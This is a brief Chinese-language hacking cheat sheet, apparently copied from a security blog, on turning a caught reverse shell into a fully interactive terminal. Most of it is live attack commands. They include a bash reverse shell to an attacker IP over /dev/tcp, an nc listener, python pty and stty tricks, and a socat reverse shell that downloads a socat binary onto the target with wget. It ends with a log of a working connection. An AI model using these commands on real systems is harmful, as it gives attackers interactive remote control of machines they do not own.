https://saucer-man.com/information_security/233.html
python -c 'import pty; pty.spawn("/bin/bash")'
攻击机本地执行 首先检查当前终端和STTY信息 $ echo $TERM $ stty -a nc开启监听 $ nc -lvvp 4444 目标机执行 $ bash -i >& /dev/tcp/192.168.81.160/4444 0>&1 接着运行如下一堆命令: # 此时攻击机已经获取到了bash # 接下来执行 $ python -c 'import pty; pty.spawn("/bin/bash")' //启用python交互式 # 把它丢到后台挂起 $ ctrl + z # 重置stty,也就意味着你看不到输入的内容 $ stty raw -echo # 把后台挂起的程序调回前台 $ fg # 完全刷新终端屏幕 $ reset # 接下来设置环境变量,根据第一步得到的环境变量来设置 $ export SHELL=bash $ export TERM=xterm-256color $ stty rows 行数 columns 列数
攻击机: 首先安装 $ sudo apt install socat 执行 $ socat file:`tty`,raw,echo=0 tcp-listen:4444 目标机: 把socat上传到目标机器上或者直接下载 $ wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat 运行 $ chmod +x /tmp/socat $ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.81.160:4444
C:\Users\w5023 λ nc -lvvp 4444 listening on [any] 4444 ... connect to [192.168.2.134] from DESKTOP-IBUUT6H.lan [192.168.2.134] 30567 ubuntu@ubuntu:~$ tty tty not a tty ubuntu@ubuntu:~$ script /dev/null script /dev/null Script started, file is /dev/null ubuntu@ubuntu:~$ tty tty /dev/pts/1